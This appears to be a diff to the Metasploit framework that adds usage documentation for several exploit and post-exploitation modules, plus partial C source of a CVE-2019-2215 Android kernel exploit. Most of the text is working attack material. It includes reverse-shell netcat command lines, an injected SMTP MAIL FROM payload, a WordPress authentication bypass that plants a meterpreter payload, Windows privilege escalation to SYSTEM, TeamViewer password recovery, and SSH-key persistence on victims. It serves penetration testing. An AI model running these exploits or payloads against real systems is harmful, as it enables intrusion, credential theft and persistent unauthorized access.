+SMTP interaction with OpenSMTPD to execute a command as the root user.
+
+### Setup
+
+1. Download [OpenBSD 6.6](https://cdn.openbsd.org/pub/OpenBSD/6.6/amd64/install66.iso)
+2. Install the system, noting the domain name (defaults to `foo.localdomain` in VMware)
+3. Configure the following settings in `/etc/mail/smtpd.conf`:
+  * `listen on all`
+  * `match from any for domain "foo.localdomain" action "local_mail"`
+4. Execute `/etc/rc.d/smtpd restart` to restart OpenSMTPD
+5. Execute `ifconfig` and look for an appropriate target IP
+
+### Targets
+
+```
+Id  Name
+--  ----
+0   OpenSMTPD >= commit a8e222352f
+```
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Options
+
+**RCPT_TO**
+
+Set this to a valid mail recipient. The default is `root`.
+
+## Scenarios
+
+### OpenSMTPD 6.6.0 on OpenBSD 6.6
+
+```
+msf5 > use exploit/unix/smtp/opensmtpd_mail_from_rce
+msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > show missing
+
+Module options (exploit/unix/smtp/opensmtpd_mail_from_rce):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+
+
+Payload options (cmd/unix/reverse_netcat):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+
+msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > set rhosts 172.16.249.137
+rhosts => 172.16.249.137
+msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > set lhost 172.16.249.1
+lhost => 172.16.249.1
+msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > run
+
+[+] mkfifo /tmp/twkfr; nc 172.16.249.1 4444 0</tmp/twkfr | /bin/sh >/tmp/twkfr 2>&1; rm /tmp/twkfr
+[*] Started reverse TCP handler on 172.16.249.1:4444
+[*] 172.16.249.137:25 - Executing automatic check (disable AutoCheck to override)
+[!] 172.16.249.137:25 - The service is running, but could not be validated.
+[*] 172.16.249.137:25 - Connecting to OpenSMTPD
+[*] 172.16.249.137:25 - Saying hello and sending exploit
+[*] 172.16.249.137:25 - Expecting: /220.*OpenSMTPD/
+[+] 172.16.249.137:25 - Received: 220 foo.localdomain ESMTP OpenSMTPD
+[*] 172.16.249.137:25 - Sending: HELO JijrF2eskbXFfdlaV
+[*] 172.16.249.137:25 - Expecting: /250.*pleased to meet you/
+[+] 172.16.249.137:25 - Received:
+250 foo.localdomain Hello JijrF2eskbXFfdlaV [172.16.249.1], pleased to meet you
+[*] 172.16.249.137:25 - Sending: MAIL FROM:<;for W in a n 0 9 g D 7 N 7 B K R i u V;do read;done;sh;exit 0;>
+[*] 172.16.249.137:25 - Expecting: /250.*Ok/
+[+] 172.16.249.137:25 - Received:
+250 2.0.0 Ok
+[*] 172.16.249.137:25 - Sending: RCPT TO:<root>
+[*] 172.16.249.137:25 - Expecting: /250.*Recipient ok/
+[+] 172.16.249.137:25 - Received:
+250 2.1.5 Destination address valid: Recipient ok
+[*] 172.16.249.137:25 - Sending: DATA
+[*] 172.16.249.137:25 - Expecting: /354 Enter mail.*itself/
+[+] 172.16.249.137:25 - Received:
+354 Enter mail, end with "." on a line by itself
+[*] 172.16.249.137:25 - Sending:
+#
+#
+#
+#
+#
+#
+#
+#
+#
+#
+#
+#
+#
+#
+#
+mkfifo /tmp/rsnzh; nc 172.16.249.1 4444 0</tmp/rsnzh | /bin/sh >/tmp/rsnzh 2>&1; rm /tmp/rsnzh
+[*] 172.16.249.137:25 - Sending: .
+[*] 172.16.249.137:25 - Expecting: /250.*Message accepted for delivery/
+[+] 172.16.249.137:25 - Received:
+250 2.0.0 5bd4f87d Message accepted for delivery
+[*] 172.16.249.137:25 - Sending: QUIT
+[*] 172.16.249.137:25 - Expecting: /221.*Bye/
+[+] 172.16.249.137:25 - Received:
+221 2.0.0 Bye
+[*] Command shell session 1 opened (172.16.249.1:4444 -> 172.16.249.137:28550) at 2020-02-28 10:28:14 -0600
+
+id
+uid=0(root) gid=0(wheel) groups=0(wheel)
+uname -a
+OpenBSD foo.localdomain 6.6 GENERIC#353 amd64
+```

documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md

@@ -0,0 +1,52 @@
+## Description
+
+OpenNetAdmin provides a database managed inventory of your IP network. Each subnet, host, and IP can be tracked via a centralized AJAX enabled web interface that can help reduce tracking errors.
+This module exploits a command injection in OpenNetAdmin. The vulnerability exists on the `tooltips.inc.php` component, due to the insecure usage of the `shell_exec()` PHP function.
+
+## Vulnerable Application
+
+This module has been tested with [OpenNetAdmin 18.1.1](https://github.com/opennetadmin/ona/releases/tag/v18.1.1)
+
+## Setup
+
+https://github.com/opennetadmin/ona/wiki/Install
+
+## Verification
+
+Launch metasploit and set the appropiate options:
+>
+> * [ ]  Start `msfconsole`
+> * [ ]  `use exploit/unix/webapp/opennetadmin_ping_cmd_injection`
+> * [ ]  `set RHOSTS <rhosts>`
+> * [ ]  `set LHOST <lhost>`
+> * [ ]  `set VHOST <hostname>`
+> * [ ]  `exploit`
+
+## Options
+
+**VHOST**
+
+The HTTP server virtual host. You will probably need to configure this as well, even though it is set as optional.
+
+## Scenarios
+
+ Tested OpenNetAdmin 18.1.1 on Ubuntu 19.10 x64
+
+```
+msf5 > use exploit/unix/webapp/opennetadmin_ping_cmd_injection
+msf5 exploit(opennetadmin_ping_cmd_injection) > set RHOSTS 172.16.172.152
+RHOSTS => 172.16.172.152
+msf5 exploit(opennetadmin_ping_cmd_injection) > set VHOST example.com
+VHOST => example.com
+msf5 exploit(opennetadmin_ping_cmd_injection) > set LHOST 172.16.172.1
+LHOST => 172.16.172.1
+msf5 exploit(opennetadmin_ping_cmd_injection) > exploit
+[*] Started reverse TCP handler on 172.16.172.1:4444
+[*] Exploiting...
+[*] Sending stage (3021284 bytes) to 172.16.172.152
+[*] Meterpreter session 1 opened (172.16.172.1:4444 -> 172.16.172.152:38590) at 2019-12-10 02:38:52 +0300
+[*] Sending stage (3021284 bytes) to 172.16.172.152
+[*] Command Stager progress - 100.12% done (810/809 bytes)
+
+meterpreter >
+```

documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md

@@ -0,0 +1,118 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits an authentication bypass in the WordPress
+InfiniteWP Client plugin to log in as an administrator and execute
+arbitrary PHP code by overwriting the file specified by `PLUGIN_FILE`.
+
+The module will attempt to retrieve the original `PLUGIN_FILE` contents
+and restore them after payload execution. If `VerifyContents` is set,
+which is the default setting, the module will check to see if the
+restored contents match the original.
+
+Note that a valid administrator username is required for this module.
+
+WordPress >= 4.9 is currently not supported due to a breaking WordPress
+API change. Tested against 4.8.3.
+
+### Setup
+
+1. Install WordPress 4.8.3 or older
+2. Download <https://downloads.wordpress.org/plugin/iwp-client.1.9.4.4.zip>
+3. Follow <https://wordpress.org/plugins/iwp-client/#installation>
+
+### Targets
+
+```
+Id  Name
+--  ----
+0   InfiniteWP Client < 1.9.4.5
+```
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Options
+
+**USERNAME**
+
+Set this to a known, valid administrator username. Authentication will
+be bypassed for this user.
+
+**PLUGIN_FILE**
+
+Set this to a plugin file to insert the payload into, relative to the
+plugins directory, which is normally `/wp-content/plugins`. The file
+must exist and be writable by the web user. It will be overwritten and
+later restored.
+
+**VerifyContents**
+
+Verify that the restored contents of `PLUGIN_FILE` match the original.
+This is the default setting.
+
+## Scenarios
+
+### InfiniteWP Client 1.9.4.4 on WordPress 4.8.3
+
+```
+msf5 > use exploit/unix/webapp/wp_infinitewp_auth_bypass
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > show missing
+
+Module options (exploit/unix/webapp/wp_infinitewp_auth_bypass):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rport 8000
+rport => 8000
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] WordPress 4.8.3 is a supported target
+[*] Found version 1.9.4.4 in the custom file
+[+] The target appears to be vulnerable.
+[*] Bypassing auth for admin at http://127.0.0.1:8000/
+[+] Successfully obtained cookie for admin
+[*] Cookie: wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CgtWIC1eZeuTo2twb615tUCpB4LEUzucWE5qaBl5dgDg%7C3f03c999c52281e3da48bef702b8c8780c3f041b2bba9f222f5d9756cbb18541; wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CgtWIC1eZeuTo2twb615tUCpB4LEUzucWE5qaBl5dgDg%7C3f03c999c52281e3da48bef702b8c8780c3f041b2bba9f222f5d9756cbb18541; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CgtWIC1eZeuTo2twb615tUCpB4LEUzucWE5qaBl5dgDg%7Ca0f3f416f7c60a7e0ea1b17af88d4a5e38d96141451f94fe27f605806f03f0c2; wordpress_sec_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CsVlsTRrZ8s8PgSudfIbMXr16rVrlnVz28mENB1jRSOP%7C5ed6dd8146701a38b741bf98cde81cc2b67736b88ea80a10ceba8cf5326b949e; wordpress_sec_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CsVlsTRrZ8s8PgSudfIbMXr16rVrlnVz28mENB1jRSOP%7C5ed6dd8146701a38b741bf98cde81cc2b67736b88ea80a10ceba8cf5326b949e; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1581271885%7CsVlsTRrZ8s8PgSudfIbMXr16rVrlnVz28mENB1jRSOP%7Cfeffe683bdfaaa670102e6564130394440510bf97e1ad09713ef1c3aa5627bfc;
+[+] Successfully logged in as admin
+[*] Retrieving original contents of /wp-content/plugins/index.php
+[+] Successfully retrieved original contents of /wp-content/plugins/index.php
+[*] Contents:
+<?php
+// Silence is golden.
+[*] Overwriting /wp-content/plugins/index.php with payload
+[*] Acquired a plugin edit nonce: 74cde501ca
+[*] Edited plugin file index.php
+[+] Successfully overwrote /wp-content/plugins/index.php with payload
+[*] Requesting payload at /wp-content/plugins/index.php
+[*] Restoring original contents of /wp-content/plugins/index.php
+[*] Sending stage (38288 bytes) to 192.168.56.1
+[*] Acquired a plugin edit nonce: 74cde501ca
+[*] Edited plugin file index.php
+[+] Current contents of /wp-content/plugins/index.php match original!
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.1:51923) at 2020-02-07 12:11:28 -0600
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > sysinfo
+Computer    : c7f8fbe7b083
+OS          : Linux c7f8fbe7b083 4.19.76-linuxkit #1 SMP Thu Oct 17 19:31:58 UTC 2019 x86_64
+Meterpreter : php/linux
+meterpreter >
+```

documentation/modules/exploit/windows/backdoor/energizer_duo_payload.md

@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan).
+More information can be found on the [Rapid7 Blog](https://blog.rapid7.com/2010/03/08/locate-and-exploit-the-energizer-trojan).
 Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.
 
 The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx).

documentation/modules/exploit/windows/local/ms16_075_reflection_juicy.md

@@ -11,6 +11,15 @@ For more info see:
 - [Rotten Potato](https://github.com/foxglovesec/RottenPotato)
 - [Lonely Potato](https://decoder.cloud/2017/12/23/the-lonely-potato/)
 - [Juicy Potato](https://ohpe.it/juicy-potato/)
+- [No More Juicy Potato](https://decoder.cloud/2018/10/29/no-more-rotten-juicy-potato/)
+
+## Vulnerable Applications
+
+Microsoft Windows Server 2008 R2, Server 2012, Server 2012 R2, and Server 2016 are known to be affected. Server 2019 was not affected by this issue.
+
+This issue was patched in Microsoft Windows 10 v1809 (build 17763). v1803 is the last vulnerable version. See [No More Juicy Potato](https://decoder.cloud/2018/10/29/no-more-rotten-juicy-potato/) for technical details.
+
+At the time of disclosure, disabling DCOM was provided as a workaround to mitigate this vulnerability. As such, servers with DCOM disabled will not be vulnerable to this attack.
 
 ## Usage
 

documentation/modules/exploit/windows/local/persistence_image_exec_options.md

@@ -58,7 +58,7 @@ Payload options (windows/x64/meterpreter/reverse_tcp):
    LHOST     192.168.135.168  yes       The listen address (an interface may be specified)
    LPORT     4545             yes       The listen port
 
-   **DisablePayloadHandler: True   (RHOST and RPORT settings will be ignored!)**
+   **DisablePayloadHandler: True   (no handler will be created!)**
 
 
 Exploit target:

documentation/modules/exploit/windows/local/ricoh_driver_privesc.md

@@ -0,0 +1,97 @@
+## Vulnerable Application
+
+  [Various Ricoh printer drivers](https://www.ricoh.com/info/2020/0122_1/list) allow escalation of
+  privileges on Windows systems.
+
+  For vulnerable drivers, a low-privileged user can
+  read/write files within the `RICOH_DRV` directory
+  and its subdirectories.
+
+  `PrintIsolationHost.exe`, a Windows process running
+  as NT AUTHORITY\SYSTEM, loads driver-specific DLLs
+  during the installation of a printer. A user can
+  elevate to SYSTEM by writing a malicious DLL to
+  the vulnerable driver directory and adding a new
+  printer with a vulnerable driver.
+
+  Multiple runs of this module may be required
+  given successful exploitation is time-sensitive.
+
+## Verification Steps
+
+  1. Install a vulnerable Ricoh driver
+  2. Start msfconsole
+  3. Get a session with basic privileges
+  4. Do: ```use exploit/windows/local/ricoh_driver_privesc```
+  5. Do: ```set SESSION <sess_no>```
+  6. Do: ```run```
+  7. You should get a shell running as SYSTEM.
+
+## Scenarios
+
+### Tested on Ricoh PCL6 Universal Driver `v4.13`
+
+  ```
+  msf5 > use multi/handler
+  msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
+  payload => windows/x64/meterpreter/reverse_tcp
+  msf5 exploit(multi/handler) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444
+  [*] Sending stage (206403 bytes) to 192.168.37.199
+  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.199:49670) at 2020-02-06 12:47:59 -0600
+
+  meterpreter > getuid
+  Server username: DESKTOP-A97LIDN\ricoh-test
+  meterpreter > sysinfo
+  Computer        : DESKTOP-A97LIDN
+  OS              : Windows 10 (10.0 Build 16299).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x64/windows
+  meterpreter > background
+  [*] Backgrounding session 1...
+  msf5 exploit(multi/handler) > use ricoh_driver_privesc
+
+  Matching Modules
+  ================
+
+     #  Name                                        Disclosure Date  Rank    Check  Description
+     -  ----                                        ---------------  ----    -----  -----------
+     0  exploit/windows/local/ricoh_driver_privesc  2020-01-22       normal  Yes    Ricoh Driver Privilege Escalation
+
+
+  [*] Using exploit/windows/local/ricoh_driver_privesc
+  msf5 exploit(windows/local/ricoh_driver_privesc) > set session 1
+  session => 1
+  msf5 exploit(windows/local/ricoh_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp
+  payload => windows/x64/meterpreter/reverse_tcp
+  msf5 exploit(windows/local/ricoh_driver_privesc) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(windows/local/ricoh_driver_privesc) > check
+  [*] The target appears to be vulnerable. Ricoh driver directory has full permissions
+  msf5 exploit(windows/local/ricoh_driver_privesc) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444
+  [*] Adding printer JLFJCi...
+  [*] Sending stage (206403 bytes) to 192.168.37.199
+  [*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.199:49673) at 2020-02-06 12:48:40 -0600
+  [*] Deleting printer JLFJCi
+  [+] Deleted C:\Users\RICOH-~1\AppData\Local\Temp\GFHCkvh.bat
+  [+] Deleted C:\Users\RICOH-~1\AppData\Local\Temp\headerfooter.dll
+
+  meterpreter > getuid
+  Server username: NT AUTHORITY\SYSTEM
+  meterpreter > sysinfo
+  Computer        : DESKTOP-A97LIDN
+  OS              : Windows 10 (10.0 Build 16299).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x64/windows
+  ```

documentation/modules/exploit/windows/misc/crosschex_device_bof.md

@@ -0,0 +1,71 @@
+## Introduction
+
+CrossChex is a personnel identity verification, access control, and time
+attendance management system compatible with Windows 7,8 & 10. It uses
+UDP broadcasts to identify and connect with Access Control devices on a
+network. The code used to handle a response from an Access Control
+device is vulnerable to a Stack Buffer Overflow attack on CrossChex
+versions `Crosschex Standard x86 <= V4.3.12`. Tracked as CVE-2019-12518,
+and as such permits arbitrary code execution.
+
+The code used to overflow the Stack Buffer and code an attacker wishes
+to be executed as a result of the exploit are sent in a single UDP
+packet as a response to the CrossChex broadcast. As both the exploit and
+the payload must be contained inside a single UDP packet, an exploit has
+a maximum size of `8947 Characters`.
+
+This module exploits CVE-2019-12518 by listening for a CrossChex "new
+device" broadcast for a given number of seconds (`TIMEOUT`). It then
+responds with a UDP packet containing shellcode for both the Buffer
+Overflow exploit and the attacker's chosen payload. The `Space` payload
+option ensures no payload of too large a size is used to ensure
+successful exploitation. If a broadcast is not detected within the given
+`TIMEOUT`, the module exits with a warning.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. `use windows/misc/crosschex_device_bof`
+3. `set LHOST vboxnet0`
+4. `run`
+5. Open CrossChex
+6. Navigate to Device > Add
+7. Select `Search`
+8. Verify payload executes correctly
+
+## Options
+
+1.  `TIMEOUT` Seconds module waits for broadcast, defaults to `1000`.
+2.  `CHOST`. Address UDP packet response is sent from. Defaults to `0.0.0.0`.
+3.  `CPORT`. Port UDP packet response is sent from. Defaults to `5050` as CrossChex expects communication from this port.
+
+## Compatible Payloads
+
+Any basic x86 windows payload.
+
+## Payload Options
+
+As above.
+
+## Scenarios
+
+```
+msf5 exploit(windows/misc/crosschex_device_bof) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] CrossChex broadcast received, sending payload in response
+[*] Payload sent
+[*] Sending stage (180291 bytes) to 192.168.56.3
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49160) at 2020-02-10 16:21:13 +0000
+
+meterpreter > ls
+Listing: C:\Program Files\Anviz\CrossChex Standard
+==================================================
+...
+```
+
+## References
+
+1. <https://cvedetails.com/cve/CVE-2019-12518>
+2. <https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html>
+3. <https://www.exploit-db.com/exploits/47734>

documentation/modules/module_doc_template.md

@@ -1,16 +1,12 @@
-The following is the recommended format for module documentation.
-But feel free to add more content/sections to this.
+The following is the recommended format for module documentation. But feel free to add more content/sections to this.
 One of the general ideas behind these documents is to help someone troubleshoot the module if it were to stop
 functioning in 5+ years, so giving links or specific examples can be VERY helpful.
 
 ## Vulnerable Application
 
-  Instructions to get the vulnerable application.  If applicable, include links to the vulnerable install files,
-  as well as instructions on installing/configuring the environment if it is different than a standard install.
-  Much of this will come from the PR, and can be copy/pasted.
+Instructions to get the vulnerable application.  If applicable, include links to the vulnerable install files, as well as instructions on installing/configuring the environment if it is different than a standard install. Much of this will come from the PR, and can be copy/pasted.
 
 ## Verification Steps
-
   Example steps in this format (is also in the PR):
 
   1. Install the application
@@ -18,18 +14,19 @@ functioning in 5+ years, so giving links or specific examples can be VERY helpfu
   3. Do: ```use [module path]```
   4. Do: ```run```
   5. You should get a shell.
-
+ 
 ## Options
+List each option and how to use it. 
 
-  **Option name**
+### Option Name
 
-  Talk about what it does, and how to use it appropriately.  If the default value is likely to change, include the default value here.
+Talk about what it does, and how to use it appropriately.  If the default value is likely to change, include the default value here.
 
 ## Scenarios
+Specific demo of using the module that might be useful in a real world scenario.
 
-### Version of software and OS as applicable
 
-  Specific demo of using the module that might be useful in a real world scenario.
+### Version and OS
 
   ```
   code or console output
@@ -43,4 +40,4 @@ functioning in 5+ years, so giving links or specific examples can be VERY helpfu
   msf > use module_name
   msf auxiliary(module_name) > set POWERLEVEL >9000
   msf auxiliary(module_name) > exploit
-  ```
+  ```

documentation/modules/post/windows/gather/credentials/teamviewer_passwords.md

@@ -0,0 +1,40 @@
+## Vulnerable Application
+
+  Any Windows host with a `meterpreter` session and TeamViewer 7+
+  installed. The following passwords will be searched for and recovered:
+  
+  * Options Password -- All module-supported TeamViewer versions (7+)
+  * Unattended Password -- TeamViewer versions 7 - 9
+  * License Key -- TeamViewer versions 7 - 14
+  
+### Installation Steps
+
+  1. Download the latest installer of TeamViewer.
+  2. Select "Custom Install With Unattended Password" during
+    installation
+  3. After installation, navigate to
+    `Extra > Options > Security > Advanced > Show Advanced Settings` and
+    set the "Options Password"
+    * Options can also be exported to a .reg file from here.
+
+## Verification Steps
+
+  1. Get a `meterpreter` session on a Windows host.
+  2. Do: ```run post/windows/gather/credentials/teamviewer_passwords```
+  3. If the system has registry keys for TeamViewer passwords they will be printed out.
+
+## Options
+
+  None.
+
+## Scenarios
+
+```
+meterpreter > run post/windows/gather/credentials/teamviewer_passwords 
+
+[*] Finding TeamViewer Passwords on WEQSQUGO-2156
+[+] Found Exported Unattended Password: P@$$w0rd
+[+] Found Options Password: op*****5
+[+] Passwords stored in: /home/blurbdust/.msf4/loot/20200207052401_default_***.***.***.***_host.teamviewer__588749.txt
+meterpreter > 
+```

documentation/modules/post/windows/manage/sshkey_persistence.md

@@ -0,0 +1,89 @@
+This module will add an SSH key to a specified user (or all), to allow remote login on the victim via SSH at any time.
+
+### Creating A Testing Environment
+
+  This module has been tested against:
+
+1. Windows 10, 1903
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Exploit a box via whatever method
+  3. Do: `use post/windows/manage/sshkey_persistence`
+  4. Do: `set session #`
+  5. Optional Do: `set USERNAME`
+  6. Optional Do: `set SSHD_CONFIG`
+  7. Do: `run`
+
+
+## Options
+
+  **SSHD_CONFIG**
+
+  Location of the sshd_config file on the remote system.
+  We use this to determine if the authorized_keys file location has changed on the system.
+  If it hasn't, we default to .ssh/authorized_keys
+
+  **USERNAME**
+
+  If set, we only write our key to this user.  If not, we'll write to all users
+
+  **PUBKEY**
+
+  A public key to use.  If not provided, a pub/priv key pair is generated automatically
+
+  **ADMIN_KEY_FILE**
+
+  Location of public keys for Administrator level accounts
+
+  **ADMIN**
+
+  Add public keys for gaining access to Administrator level accounts
+
+  **EDIT_CONFIG**
+
+  Allow the module to edit the sshd_config to enable public key authentication
+
+## Scenarios
+
+Get initial access
+
+    msf auxiliary(ssh_login) > exploit
+    
+    [*] SSH - Starting bruteforce
+    [+] SSH - Success: 'tiki:tiki' 'uid=1000(tiki) gid=1000(tiki) groups=1000(tiki),4(adm),24(cdrom),27(sudo),30(dip),
+    46(plugdev),110(lxd),117(lpadmin),118(sambashare) Linux tikiwiki 4.4.0-21-generic
+    #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
+    [!] No active DB -- Credential data will not be saved!
+    [*] Command shell session 1 opened (192.168.2.229:38886 -> 192.168.2.190:22) at 2016-06-19 09:52:48 -0400
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+
+Use the post module to write the ssh key
+
+    msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence 
+    msf post(sshkey_persistence) > set SESSION 1
+    SESSION => 1
+    msf post(sshkey_persistence) > set CREATESSHFOLDER true
+    CreateSSHFolder => true    
+    msf5 post(windows/manage/sshkey_persistence) > run
+    
+    [*] Checking SSH Permissions
+    [*] Authorized Keys File: .ssh/authorized_keys
+    [+] Storing new private key as /Users/dwelch/.msf4/loot/20200205161837_default_172.16.128.153_id_rsa_706898.txt
+    [*] Adding key to C:\Users\Dean Welch\.ssh\authorized_keys
+    [+] Key Added
+    [*] Adding key to C:\Users\testAccount\.ssh\authorized_keys
+    [+] Key Added
+    [*] Post module execution completed
+
+Verify our access works
+
+    ssh -i /Users/dwelch/.msf4/loot/20200205153101_default_172.16.128.153_id_rsa_457054.txt testAccount@172.16.128.153
+    
+    Microsoft Windows [Version 10.0.18362.592]
+    (c) 2019 Microsoft Corporation. All rights reserved.
+    
+    testaccount@DESKTOP-V8L6UUD C:\Users\testAccount>
+

external/source/exploits/CVE-2019-2215/Android.mk

@@ -0,0 +1,11 @@
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+
+LOCAL_SRC_FILES := \
+	poc.c
+
+LOCAL_MODULE    := poc
+
+include $(BUILD_EXECUTABLE)
+

external/source/exploits/CVE-2019-2215/Makefile

@@ -0,0 +1,15 @@
+all: build
+
+build:
+	ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=arm64-v8a
+
+push: build
+	adb push libs/arm64-v8a/poc /data/local/tmp/poc
+
+install: build
+	cp libs/arm64-v8a/poc ../../../../data/exploits/CVE-2019-2215/exploit 
+
+clean:
+	rm -rf libs
+	rm -rf obj
+

external/source/exploits/CVE-2019-2215/README.md

@@ -0,0 +1,12 @@
+
+## CVE-2019-2215
+
+Copy and pasted from:
+
+https://bugs.chromium.org/p/project-zero/issues/detail?id=1942
+
+https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/
+
+https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c
+
+

external/source/exploits/CVE-2019-2215/poc.c

@@ -0,0 +1,379 @@
+/*
+ * POC to gain arbitrary kernel R/W access using CVE-2019-2215
+ * https://bugs.chromium.org/p/project-zero/issues/detail?id=1942
+ *
+ * Jann Horn & Maddie Stone of Google Project Zero
+ *
+ * 3 October 2019
+*/
+
+#define _GNU_SOURCE
+#include <stdbool.h>
+#include <sys/mman.h>
+#include <sys/wait.h>
+#include <ctype.h>
+#include <sys/uio.h>
+#include <err.h>
+#include <sched.h>
+#include <fcntl.h>
+#include <sys/epoll.h>
+#include <sys/ioctl.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <linux/sched.h>
+#include <string.h>
+#include <sys/prctl.h>
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <errno.h>
+
+#define BINDER_THREAD_EXIT 0x40046208ul
+// NOTE: we don't cover the task_struct* here; we want to leave it uninitialized
+#define BINDER_THREAD_SZ 0x190
+#define IOVEC_ARRAY_SZ (BINDER_THREAD_SZ / 16) //25
+#define WAITQUEUE_OFFSET 0xA0
+#define IOVEC_INDX_FOR_WQ (WAITQUEUE_OFFSET / 16) //10
+
+void hexdump_memory(unsigned char *buf, size_t byte_count) {
+  unsigned long byte_offset_start = 0;
+  if (byte_count % 16)
+    errx(1, "hexdump_memory called with non-full line");
+  for (unsigned long byte_offset = byte_offset_start; byte_offset < byte_offset_start + byte_count;
+          byte_offset += 16) {
+    char line[1000];
+    char *linep = line;
+    linep += sprintf(linep, "%08lx  ", byte_offset);
+    for (int i=0; i<16; i++) {
+      linep += sprintf(linep, "%02hhx ", (unsigned char)buf[byte_offset + i]);
+    }
+    linep += sprintf(linep, " |");
+    for (int i=0; i<16; i++) {
+      char c = buf[byte_offset + i];
+      if (isalnum(c) || ispunct(c) || c == ' ') {
+        *(linep++) = c;
+      } else {
+        *(linep++) = '.';
+      }
+    }
+    linep += sprintf(linep, "|");
+    puts(line);
+  }
+}
+
+int epfd;
+
+void *dummy_page_4g_aligned;
+unsigned long current_ptr;
+int binder_fd;
+
+void leak_task_struct(void)
+{
+  struct epoll_event event = { .events = EPOLLIN };
+  if (epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event)) err(1, "epoll_add");
+
+  struct iovec iovec_array[IOVEC_ARRAY_SZ];
+  memset(iovec_array, 0, sizeof(iovec_array));
+
+  iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page_4g_aligned; /* spinlock in the low address half must be zero */
+  iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 0x1000; /* wq->task_list->next */
+  iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */
+  iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x1000;
+
+  int b;
+  
+  int pipefd[2];
+  if (pipe(pipefd)) err(1, "pipe");
+  if (fcntl(pipefd[0], F_SETPIPE_SZ, 0x1000) != 0x1000) err(1, "pipe size");
+  static char page_buffer[0x1000];
+  //if (write(pipefd[1], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer)) err(1, "fill pipe");
+
+  pid_t fork_ret = fork();
+  if (fork_ret == -1) err(1, "fork");
+  if (fork_ret == 0){
+    /* Child process */
+    prctl(PR_SET_PDEATHSIG, SIGKILL);
+    sleep(2);
+    printf("CHILD: Doing EPOLL_CTL_DEL.\n");
+    epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event);
+    printf("CHILD: Finished EPOLL_CTL_DEL.\n");
+    // first page: dummy data
